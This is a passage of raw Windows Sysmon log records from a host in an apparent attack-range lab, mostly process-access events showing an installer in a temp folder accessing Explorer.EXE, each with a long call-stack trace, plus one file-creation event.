ppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\plugin-hang-ui.exe2021-01-18 13:59:52.521 10341000x800000000000000015327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storag